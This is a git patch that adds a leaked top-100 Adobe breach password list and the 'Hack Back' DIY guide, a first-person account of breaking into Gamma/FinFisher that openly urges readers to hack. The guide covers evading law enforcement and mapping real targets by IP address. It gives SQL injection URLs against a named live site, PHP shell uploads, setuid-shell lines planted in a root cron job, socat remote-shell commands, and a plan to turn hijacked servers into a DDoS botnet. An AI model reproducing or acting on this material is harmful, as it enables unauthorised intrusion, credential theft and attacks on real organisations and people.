From e6e3bd46c612569945bc13d31f1bdb218b6af3ab Mon Sep 17 00:00:00 2001 From: Marina von Steinkirch Date: Sat, 6 Aug 2016 12:50:04 -0700 Subject: [PATCH] Add hack back pastebin --- .DS_Store | Bin 0 -> 8196 bytes Other_Hackings/.DS_Store | Bin 8196 -> 8196 bytes Other_Hackings/useful_lists/.DS_Store | Bin 6148 -> 6148 bytes Other_Hackings/wordlists/.DS_Store | Bin 14340 -> 12292 bytes Other_Hackings/wordlists/adobe-top100.txt | 123 +++++++ Other_guides/cRYvK4jb.txt | 407 ++++++++++++++++++++++ 6 files changed, 530 insertions(+) create mode 100644 .DS_Store create mode 100644 Other_Hackings/wordlists/adobe-top100.txt create mode 100644 Other_guides/cRYvK4jb.txt diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..8516f15da552584356e0da88d9cd89d77ad74c85 GIT binary patch literal 8196 zcmeHMOK;Oa5S~o~O$d*ahd_dZk04d30fE|ENLwBfg^Hk7h(d@PlUTTRNSubKs+2Ro zfHUtae*wXb9{~S^Tlr?}RJPO50}=vdH}cMAz2EH4x1QOILqw|7sTGLM5K#sf%X|*i z9)<7oHB?ez4}%r(L>BqfzU6r9rZY5JcW4GQ1DXNNfM!55@GmfcGn-3h#JL~b)wO0o zGccA6aC|Uuu`GtNA4mxus3Zk|Oru*0+QaOz$HHwD~%Xlqji2$yP*t7x_82I>vW9lkjj zXrONi4LMrCjO+9aV_Wo;Y;uNC>U#o}#hf0-TbQ#A%zAR3)Z+vqO}FSSR-0T8Gw~|I z#3bFu$az|%J5;8{xc##F=;$LDZDS1`dI8IC!e+LFd+KqdFc(E0qb00Lf$sWq_ zCqH%QQMuuD%YN1Gv`f|2L-}UcEHi8`SN+DIec$t(-FDSnv8`?;e{$Y){i^L+tq62& z)pl!Mx8!x)T6?V==v%dGexs5P1~{kUM9<*O8)fL)}_mrr;Wnw z_O!7zcXe*sxH?zZ-p+r@WX@i=a&75BbNl7%H*ep)|M2ni7h!=^c*xO-;QMa+f)!iqFllO+`^h5dVB2>Jr)aITd2abF_jP99YWhu7+`n==c9)!-qChGcb+} zsPsa4p#;kZKRc2naIS6OdV-4!kLw3gAgClAhm>?2a`z8Iv<(bpOfi)GK%xibufGWR S)8AkE{3m_>%cJ{WSHA#-&Tt3- literal 0 HcmV?d00001 diff --git a/Other_Hackings/.DS_Store b/Other_Hackings/.DS_Store index 5efb9590b9ca8d37f96f8990e397cbb86763c6ee..12c890765a740fb2d28b2ce5e3705e54e87fe89d 100644 GIT binary patch delta 298 zcmZp1XmOa}FUrfnz`)4BAi%(o%@EI!%#gv5%82Hwr=94s8_AQgfz8Dv#J zb}>UKLoS0Jkj|JqPe6V$zd*(0y#hUqtdqS2ofx?$_X_sQad5^9h*wt|85`>;7+Tco zC{$aTS?Va5SsK>X3T&KgC1gH1P*9SmEVw8yCqFM8Q3BLEr#O3MHM delta 270 zcmZp1XmOa}FUrlpz`)4BAi%(o#E=h!*`7K1$r}r&u}^H^-OSFx!okQr*-xNapPQk8 zp#&%&&rkz|@eJueUK&F_NOe+9eiG0Wpb?BWfb@+2Krs1`z+^_o$#Q}Ulgk8^fM(1T z?3d%@j295Et~RvLQ7|#7)lsN6G%zvJQLr#JuB{b#GTBYYeDYGEG)9)mJi@9H-;xS) zGK)(L3~n+qF|)9;v2$>8adUBlO)>zPBnmVMs2gmMnE}vDQ&TgbIXxU4(we4@zL5pB wU5gekS-NcbiUWrxM+wO@9-b^9EVkJ}=NHtHXDnw0eOr}087tGkN^Mx diff --git a/Other_Hackings/useful_lists/.DS_Store b/Other_Hackings/useful_lists/.DS_Store index 600d206ae564d96ab7493e4b170afabea422e333..c619f6a4c23743a8427e571b89afb4dde496a327 100644 GIT binary patch delta 32 mcmZoMXffE($;iEffq~&Y5HtV(zj+~J8r#GM-p%YBfB6BjDGLJt delta 32 kcmZoMXffE($;f?%fq_BeKNxIY$e6}9v4M9pJI7ys0O|)0NdN!< diff --git a/Other_Hackings/wordlists/.DS_Store b/Other_Hackings/wordlists/.DS_Store index 52852763caf8a302657702c36b026e56336112bb..0a40e0afe00b4e7c2d2b7d86e533c633c61d4db7 100644 GIT binary patch delta 225 zcmZoEXh~3DU|?W$DortDV9)?EIe-{M3-ADmb_NCo?uiQejDZsaoEar1=c$WNzNl`x z@qso!quIm>KAU+2JXnA_nBqXXCM$@^ZmtxmV%uCSJ%eSk0;9=hZiPe4q5=$w3@Hrx z3`q>B47v;@Kvn^R;p7R5Qd|sy3=FKNfO=UrA5;F!tj@ zpv}){zBxj`gN5Ti6im($lihq&q>7DSl%a?rpCOqco1qd&mrhO))|#9k!6L&t4Wbli zECT~KnxYMoQcSFmHk(KSP>BEl diff --git a/Other_Hackings/wordlists/adobe-top100.txt b/Other_Hackings/wordlists/adobe-top100.txt new file mode 100644 index 0000000..26144a7 --- /dev/null +++ b/Other_Hackings/wordlists/adobe-top100.txt @@ -0,0 +1,123 @@ +Top 100 Adobe Passwords with Count + +We do not (yet) have the keys Adobe used to encrypt the passwords of 130,324,429 users affected by +their most recent breach. However, thanks to Adobe choosing symmetric key encryption over hashing, +selecting ECB mode, and using the same key for every password, combined with a large number of +known plaintexts and the generosity of users who flat-out gave us their password in their password +hint, this is not preventing us from presenting you with this list of the top 100 passwords +selected by Adobe users. + +While we are fairly confident in the accuracy of this list, we have no way to actually verify it +right now. We don't have the keys, and Adobe is not letting any of the affected accounts log in +until the owners reset their passwords. So, it is possible there is an error or two in here. Caveat +emptor and such. + + + +# Count Ciphertext Plaintext +-------------------------------------------------------------- +1. 1911938 EQ7fIpT7i/Q= 123456 +2. 446162 j9p+HwtWWT86aMjgZFLzYg== 123456789 +3. 345834 L8qbAD3jl3jioxG6CatHBw== password +4. 211659 BB4e6X+b2xLioxG6CatHBw== adobe123 +5. 201580 j9p+HwtWWT/ioxG6CatHBw== 12345678 +6. 130832 5djv7ZCI2ws= qwerty +7. 124253 dQi0asWPYvQ= 1234567 +8. 113884 7LqYzKVeq8I= 111111 +9. 83411 PMDTbP0LZxu03SwrFUvYGA== photoshop +10. 82694 e6MPXQ5G6a8= 123123 +11. 76910 j9p+HwtWWT8/HeZN+3oiCQ== 1234567890 +12. 76186 diQ+ie23vAA= 000000 +13. 70791 kCcUSCmonEA= abc123 +14. 61453 ukxzEcXU6Pw= 1234 +15. 56744 5wEAInH22i4= adobe1 +16. 54651 WqflwJFYW3+PszVFZo1Ggg== macromedia +17. 48850 hjAYsdUA4+k= azerty +18. 47142 rpkvF+oZzQvioxG6CatHBw== iloveyou +19. 44281 xz6PIeGzr6g= aaaaaa +20. 43670 Ypsmk6AXQTk= 654321 +21. 43497 4V+mGczxDEA= 12345 +22. 37407 yp2KLbBiQXs= 666666 +23. 35325 2dJY5hIJ4FHioxG6CatHBw== sunshine +24. 34963 1McuJ/7v9nE= 123321 +25. 33452 yxzNxPIsFno= letmein +26. 32549 dCgB24yq9Bw= monkey +27. 31554 dA8D8OYD55E= asdfgh +28. 28349 L8qbAD3jl3jSPm/keox4fA== password1 +29. 28303 zk8NJgAOqc4= shadow +30. 28132 Ttgs5+ZAZM7ioxG6CatHBw== princess +31. 27853 pTkQrKZ/JYM= dragon +32. 27840 2aZl4Ouarwm52NYYI936YQ== adobeadobe +33. 27720 NpVKrCM6pKw= daniel +34. 27699 Dts8klglTQDioxG6CatHBw== computer +35. 27415 4aiR1wv9z2Q= michael +36. 27387 XpDlpOQzTSE= 121212 +37. 26502 ldvmctKdeN8= charlie +38. 25341 5nRuxOG9/Ho= master +39. 24499 y7F6CyUyVM/ioxG6CatHBw== superman +40. 24372 R3jcdque71gE+R+mSnMKEA== qwertyuiop +41. 23417 TduxwnCuA1U= 112233 +42. 23157 2hD1nmJUmh3ioxG6CatHBw== asdfasdf +43. 22719 MyFBO2YW+Bw= jessica +44. 22672 cSZM/nlchzzioxG6CatHBw== 1q2w3e4r +45. 22204 Vqit1GVLLek= welcome +46. 22180 e+4n2zDarnvioxG6CatHBw== 1qaz2wsx +47. 22143 ZHgi8hFCTvrSPm/keox4fA== 987654321 +48. 22103 OrzNCxMfwrw= fdsa +49. 21795 4chDWZgI7v0= 753951 +50. 21449 vp6d18mfGL+5n2auThm2+Q== chocolate +51. 21383 4I4DOfx+UUg= fuckyou +52. 21208 Z07sabFOg5Y= soccer +53. 21100 pBqRSZNU8XU= tigger +54. 20961 WlMTLimQ5b4= asdasd +55. 20581 r/OONiXT+Ko= thomas +56. 20578 XWL3FNwnp+czgMjd+wJwNw== asdfghjkl +57. 20571 ueE89xIj8RTioxG6CatHBw== internet +58. 20331 ietF94QrMIbioxG6CatHBw== michelle +59. 20268 ecW6IyEemknioxG6CatHBw== football +60. 20022 ziypr2hyamc= 123qwe +61. 19907 7MLKr9CfrNg= zxcvbnm +62. 19825 7Z6uMyq9bpxe1EB7HijrBQ== dreamweaver +63. 19818 ZDxAirVSzvs= 7777777 +64. 19237 zkXlvHcZYOg= maggie +65. 19129 GymA1zhi51k= qazwsx +66. 19113 lVwka/Mn8TPioxG6CatHBw== baseball +67. 18969 ghrvkwCcX4bioxG6CatHBw== jennifer +68. 18879 FTeB5SkrOZM= jordan +69. 18470 eOsrbcW/PeTioxG6CatHBw== abcd1234 +70. 18177 Nz4/TI6o5RrioxG6CatHBw== trustno1 +71. 18108 wQKWOaXi5eA= buster +72. 18049 b5LJqTmQmvQ= 555555 +73. 18008 tnWjMXDBaIkzgMjd+wJwNw== liverpool +74. 17986 NtCzq/i0Ffc= abc +75. 17933 iMhaearHXjPioxG6CatHBw== whatever +76. 17717 OPQxDLW2L+DioxG6CatHBw== 11111111 +77. 17706 jAZbtIgk1cg= 102030 +78. 17581 g5pZihfzGve6cdBSCql/UQ== 123123123 +79. 17454 MEXwK6GOWHk= andrea +80. 17442 JXko2WSrc6s= pepper +81. 17296 VATj787A2Ho= nicole +82. 17174 oa/GBGqIApo= killer +83. 17077 7eu5/SYuhng= abcdef +84. 16963 ORpiFlGkd0g= hannah +85. 16898 L3uQHNDF6Mw= test +86. 16616 kAtMKrzaD6jxHUX3hQObgQ== alexander +87. 16535 HWMCJDWy2MI= andrew +88. 16526 u5YtgXT+JKk= 222222 +89. 16468 +XW6eYb0HTg= joshua +90. 16456 WVVYjePjnX4= freedom +91. 16374 QSay9kzQVz8= samsung +92. 16177 F9nqBYx2LhA= asdfghj +93. 16091 6KJbvp1JGKY= purple +94. 16073 FcX+iulysVg= ginger +95. 15962 v0cefPH2OLI= 123654 +96. 15910 e21tszGBy4k= matrix +97. 15803 fbO2Wx232qY= secret +98. 15788 kOAk8W94ZX4= summer +99. 15752 pCVd59qFewU= 1q2w3e +100. 15637 agRGj5rtLD8= snoopy1 + + + +https://twitter.com/jmgosney +https://sagitta.pw/ diff --git a/Other_guides/cRYvK4jb.txt b/Other_guides/cRYvK4jb.txt new file mode 100644 index 0000000..a357861 --- /dev/null +++ b/Other_guides/cRYvK4jb.txt @@ -0,0 +1,407 @@ + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) + + A DIY Guide for those without the patience to wait for whistleblowers + + +--[ 1 ]-- Introduction + +I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz +it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple +it is, and to hopefully inform and inspire you to go out and hack shit. If you +have no experience with programming or hacking, some of the text below might +look like a foreign language. Check the resources section at the end to help you +get started. And trust me, once you've learned the basics you'll realize this +really is easier than filing a FOIA request. + + +--[ 2 ]-- Staying Safe + +This is illegal, so you'll need to take same basic precautions: + +1) Make a hidden encrypted volume with Truecrypt 7.1a [0] +2) Inside the encrypted volume install Whonix [1] +3) (Optional) While just having everything go over Tor thanks to Whonix is + probably sufficient, it's better to not use an internet connection connected + to your name or address. A cantenna, aircrack, and reaver can come in handy + here. + +[0] https://truecrypt.ch/downloads/ +[1] https://www.whonix.org/wiki/Download#Install_Whonix + +As long as you follow common sense like never do anything hacking related +outside of Whonix, never do any of your normal computer usage inside Whonix, +never mention any information about your real life when talking with other +hackers, and never brag about your illegal hacking exploits to friends in real +life, then you can pretty much do whatever you want with no fear of being v&. + +NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable +for some things like web browsing, when it comes to using hacking tools like +nmap, sqlmap, and nikto that are making thousands of requests, they will run +very slowly over Tor. Not to mention that you'll want a public IP address to +receive connect back shells. I recommend using servers you've hacked or a VPS +paid with bitcoin to hack from. That way only the low bandwidth text interface +between you and the server is over Tor. All the commands you're running will +have a nice fast connection to your target. + + +--[ 3 ]-- Mapping out the target + +Basically I just repeatedly use fierce [0], whois lookups on IP addresses and +domain names, and reverse whois lookups to find all IP address space and domain +names associated with an organization. + +[0] http://ha.ckers.org/fierce/ + +For an example let's take Blackwater. We start out knowing their homepage is at +academi.com. Running fierce.pl -dns academi.com we find the subdomains: +67.238.84.228 email.academi.com +67.238.84.242 extranet.academi.com +67.238.84.240 mail.academi.com +67.238.84.230 secure.academi.com +67.238.84.227 vault.academi.com +54.243.51.249 www.academi.com + +Now we do whois lookups and find the homepage of www.academi.com is hosted on +Amazon Web Service, while the other IPs are in the range: +NetRange: 67.238.84.224 - 67.238.84.255 +CIDR: 67.238.84.224/27 +CustName: Blackwater USA +Address: 850 Puddin Ridge Rd + +Doing a whois lookup on academi.com reveals it's also registered to the same +address, so we'll use that as a string to search with for the reverse whois +lookups. As far as I know all the actual reverse whois lookup services cost +money, so I just cheat with google: +"850 Puddin Ridge Rd" inurl:ip-address-lookup +"850 Puddin Ridge Rd" inurl:domaintools + +Now run fierce.pl -range on the IP ranges you find to lookup dns names, and +fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more +whois lookups and repeat the process until you've found everything. + +Also just google the organization and browse around its websites. For example on +academi.com we find links to a careers portal, an online store, and an employee +resources page, so now we have some more: +54.236.143.203 careers.academi.com +67.132.195.12 academiproshop.com +67.238.84.236 te.academi.com +67.238.84.238 property.academi.com +67.238.84.241 teams.academi.com + +If you repeat the whois lookups and such you'll find academiproshop.com seems to +not be hosted or maintained by Blackwater, so scratch that off the list of +interesting IPs/domains. + +In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com +was simply a whois lookup of finfisher.com which found it registered to the name +"FinFisher GmbH". Googling for: +"FinFisher GmbH" inurl:domaintools +finds gamma-international.de, which redirects to finsupport.finfisher.com + +...so now you've got some idea how I map out a target. +This is actually one of the most important parts, as the larger the attack +surface that you are able to map out, the easier it will be to find a hole +somewhere in it. + + +--[ 4 ]-- Scanning & Exploiting + +Scan all the IP ranges you found with nmap to find all services running. Aside +from a standard port scan, scanning for SNMP is underrated. + +Now for each service you find running: + +1) Is it exposing something it shouldn't? Sometimes companies will have services +running that require no authentication and just assume it's safe because the url +or IP to access it isn't public. Maybe fierce found a git subdomain and you can +go to git.companyname.come/gitweb/ and browse their source code. + +2) Is it horribly misconfigured? Maybe they have an ftp server that allows +anonymous read or write access to an important directory. Maybe they have a +database server with a blank admin password (lol stratfor). Maybe their embedded +devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's +default password. + +3) Is it running an old version of software vulnerable to a public exploit? + + +Webservers deserve their own category. For any webservers, including ones nmap +will often find running on nonstandard ports, I usually: + +1) Browse them. Especially on subdomains that fierce finds which aren't intended +for public viewing like test.company.com or dev.company.com you'll often find +interesting stuff just by looking at them. + +2) Run nikto [0]. This will check for things like webserver/.svn/, +webserver/backup/, webserver/phpinfo.php, and a few thousand other common +mistakes and misconfigurations. + +3) Identify what software is being used on the website. WhatWeb is useful [1] + +4) Depending on what software the website is running, use more specific tools +like wpscan [2], CMS-Explorer [3], and Joomscan [4]. + +First try that against all services to see if any have a misconfiguration, +publicly known vulnerability, or other easy way in. If not, it's time to move +on to finding a new vulnerability: + +5) Custom coded web apps are more fertile ground for bugs than large widely used +projects, so try those first. I use ZAP [5], and some combination of its +automated tests along with manually poking around with the help of its +intercepting proxy. + +6) For the non-custom software they're running, get a copy to look at. If it's +free software you can just download it. If it's proprietary you can usually +pirate it. If it's proprietary and obscure enough that you can't pirate it you +can buy it (lame) or find other sites running the same software using google, +find one that's easier to hack, and get a copy from them. + +[0] http://www.cirt.net/nikto2 +[1] http://www.morningstarsecurity.com/research/whatweb +[2] http://wpscan.org/ +[3] https://code.google.com/p/cms-explorer/ +[4] http://sourceforge.net/projects/joomscan/ +[5] https://code.google.com/p/zaproxy/ + + +For finsupport.finfisher.com the process was: + +* Start nikto running in the background. + +* Visit the website. See nothing but a login page. Quickly check for sqli in the + login form. + +* See if WhatWeb knows anything about what software the site is running. + +* WhatWeb doesn't recognize it, so the next question I want answered is if this + is a custom website by Gamma, or if there are other websites using the same + software. + +* I view the page source to find a URL I can search on (index.php isn't + exactly unique to this software). I pick Scripts/scripts.js.php, and google: + allinurl:"Scripts/scripts.js.php" + +* I find there's a handful of other sites using the same software, all coded by + the same small webdesign firm. It looks like each site is custom coded but + they share a lot of code. So I hack a couple of them to get a collection of + code written by the webdesign firm. + +At this point I can see the news stories that journalists will write to drum +up views: "In a sophisticated, multi-step attack, hackers first compromised a +web design firm in order to acquire confidential data that would aid them in +attacking Gamma Group..." + +But it's really quite easy, done almost on autopilot once you get the hang of +it. It took all of a couple minutes to: + +* google allinurl:"Scripts/scripts.js.php" and find the other sites + +* Notice they're all sql injectable in the first url parameter I try. + +* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with + the option --tamper='tamper/modsecurityversioned.py' + +* Acquire the admin login information, login and upload a php shell [1] (the + check for allowable file extensions was done client side in javascript), and + download the website's source code. + +[0] http://sqlmap.org/ +[1] https://epinna.github.io/Weevely/ + +Looking through the source code they might as well have named it Damn Vulnerable +Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in +javascript, and if you're unauthenticated the admin page just sends you back to +the login page with a Location header, but you can have your intercepting proxy +filter the Location header out and access it just fine. + +[0] http://www.dvwa.co.uk/ + +Heading back over to the finsupport site, the admin /BackOffice/ page returns +403 Forbidden, and I'm having some issues with the LFI, so I switch to using the +sqli (it's nice to have a dozen options to choose from). The other sites by the +web designer all had an injectable print.php, so some quick requests to: +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 +reveal that finsupport also has print.php and it is injectable. And it's +database admin! For MySQL this means you can read and write files. It turns out +the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. +But I can use a short script that uses sqlmap --file-read to get the php source +for a URL, and a normal web request to get the HTML, and then finds files +included or required in the php source, and finds php files linked in the HTML, +to recursively download the source to the whole site. + +Looking through the source, I see customers can attach a file to their support +tickets, and there's no check on the file extension. So I pick a username and +password out of the customer database, create a support request with a php shell +attached, and I'm in! + + +--[ 5 ]-- (fail at) Escalating + + ___________ +< got r00t? > + ----------- + \ ^__^ + \ (oo)\_______ + (__)\ )\/\ + ||----w | + || || + ^^^^^^^^^^^^^^^^ + +Root over 50% of linux servers you encounter in the wild with two easy scripts, +Linux_Exploit_Suggester [0], and unix-privesc-check [1]. + +[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester +[1] https://code.google.com/p/unix-privesc-check/ + +finsupport was running the latest version of Debian with no local root exploits, +but unix-privesc-check returned: +WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user +www-data can write to /etc/cron.hourly/mgmtlicensestatus +WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data +can write to /etc/cron.hourly/webalizer + +so I add to /etc/cron.hourly/webalizer: +chown root:root /path/to/my_setuid_shell +chmod 04755 /path/to/my_setuid_shell + +wait an hour, and ....nothing. Turns out that while the cron process is running +it doesn't seem to be actually running cron jobs. Looking in the webalizer +directory shows it didn't update stats the previous month. Apparently after +updating the timezone cron will sometimes run at the wrong time or sometimes not +run at all and you need to restart cron after changing the timezone. ls -l +/etc/localtime shows the timezone got updated June 6, the same time webalizer +stopped recording stats, so that's probably the issue. At any rate, the only +thing this server does is host the website, so I already have access to +everything interesting on it. Root wouldn't get much of anything new, so I move +on to the rest of the network. + + +--[ 6 ]-- Pivoting + +The next step is to look around the local network of the box you hacked. This +is pretty much the same as the first Scanning & Exploiting step, except that +from behind the firewall many more interesting services will be exposed. A +tarball containing a statically linked copy of nmap and all its scripts that you +can upload and run on any box is very useful for this. The various nfs-* and +especially smb-* scripts nmap has will be extremely useful. + +The only interesting thing I could get on finsupport's local network was another +webserver serving up a folder called 'qateam' containing their mobile malware. + + +--[ 7 ]-- Have Fun + +Once you're in their networks, the real fun starts. Just use your imagination. +While I titled this a guide for wannabe whistleblowers, there's no reason to +limit yourself to leaking documents. My original plan was to: +1) Hack Gamma and obtain a copy of the FinSpy server software +2) Find vulnerabilities in FinSpy server. +3) Scan the internet for, and hack, all FinSpy C&C servers. +4) Identify the groups running them. +5) Use the C&C server to upload and run a program on all targets telling them + who was spying on them. +6) Use the C&C server to uninstall FinFisher on all targets. +7) Join the former C&C servers into a botnet to DDoS Gamma Group. + +It was only after failing to fully hack Gamma and ending up with some +interesting documents but no copy of the FinSpy server software that I had to +make due with the far less lulzy backup plan of leaking their stuff while +mocking them on twitter. +Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password +already so I can move on to step 2! + + +--[ 8 ]-- Other Methods + +The general method I outlined above of scan, find vulnerabilities, and exploit +is just one way to hack, probably better suited to those with a background in +programming. There's no one right way, and any method that works is as good as +any other. The other main ways that I'll state without going into detail are: + +1) Exploits in web browers, java, flash, or microsoft office, combined with +emailing employees with a convincing message to get them to open the link or +attachment, or hacking a web site frequented by the employees and adding the +browser/java/flash exploit to that. +This is the method used by most of the government hacking groups, but you don't +need to be a government with millions to spend on 0day research or subscriptions +to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit +for a couple thousand, and rent access to one for much less. There's also +metasploit browser autopwn, but you'll probably have better luck with no +exploits and a fake flash updater prompt. + +2) Taking advantage of the fact that people are nice, trusting, and helpful 95% +of the time. +The infosec industry invented a term to make this sound like some sort of +science: "Social Engineering". This is probably the way to go if you don't know +too much about computers, and it really is all it takes to be a successful +hacker [0]. + +[0] https://www.youtube.com/watch?v=DB6ywr9fngU + + +--[ 9 ]-- Resources + +Links: + +* https://www.pentesterlab.com/exercises/ +* http://overthewire.org/wargames/ +* http://www.hackthissite.org/ +* http://smashthestack.org/ +* http://www.win.tue.nl/~aeb/linux/hh/hh.html +* http://www.phrack.com/ +* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot +* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash +* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ +* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers + (all his other blog posts are great too) +* https://www.corelan.be/ (start at Exploit writing tutorial part 1) +* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ + One trick it leaves out is that on most systems the apache access log is + readable only by root, but you can still include from /proc/self/fd/10 or + whatever fd apache opened it as. It would also be more useful if it mentioned + what versions of php the various tricks were fixed in. +* http://www.dest-unreach.org/socat/ + Get usable reverse shells with a statically linked copy of socat to drop on + your target and: + target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM + host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM + It's also useful for setting up weird pivots and all kinds of other stuff. + +Books: + +* The Web Application Hacker's Handbook +* Hacking: The Art of Exploitation +* The Database Hacker's Handbook +* The Art of Software Security Assessment +* A Bug Hunter's Diary +* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier +* TCP/IP Illustrated + +Aside from the hacking specific stuff almost anything useful to a system +administrator for setting up and administering networks will also be useful for +exploring them. This includes familiarity with the windows command prompt and unix +shell, basic scripting skills, knowledge of ldap, kerberos, active directory, +networking, etc. + + +--[ 10 ]-- Outro + +You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a +tool. It's not selling hacking tools that makes Gamma evil. It's who their +customers are targeting and with what purpose that makes them evil. That's not +to say that tools are inherently neutral. Hacking is an offensive tool. In the +same way that guerrilla warfare makes it harder to occupy a country, whenever +it's cheaper to attack than to defend it's harder to maintain illegitimate +authority and inequality. So I wrote this to try to make hacking easier and more +accessible. And I wanted to show that the Gamma Group hack really was nothing +fancy, just standard sqli, and that you do have the ability to go out and take +similar action. + +Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea +Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned +hackers, dissidents, and criminals! \ No newline at end of file